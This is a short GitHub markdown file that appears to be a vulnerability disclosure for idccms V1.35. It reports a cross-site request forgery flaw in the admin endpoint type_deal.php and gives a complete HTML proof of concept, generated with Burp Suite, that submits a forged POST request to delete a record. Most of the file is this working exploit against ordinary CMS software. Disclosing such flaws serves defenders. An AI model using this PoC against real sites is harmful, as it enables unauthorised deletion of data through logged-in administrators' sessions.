Skip to content

Latest commit

 

History

History
19 lines (15 loc) · 707 Bytes

csrf.md

File metadata and controls

19 lines (15 loc) · 707 Bytes

target:http://idccms.com/ version: V1.35

idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://127.0.0.1:80/admin/type_deal.php?mudi=del&dataType=moneyNote&dataTypeCN=%E4%B8%8D%E6%89%A3%E6%AC%BE%E8%AF%B4%E6%98%8E&theme=cs&dataID=21

POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:80/admin/type_deal.php?mudi=del&dataType=moneyNote&dataTypeCN=%E4%B8%8D%E6%89%A3%E6%AC%BE%E8%AF%B4%E6%98%8E&theme=cs&dataID=21" method="POST">
      
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>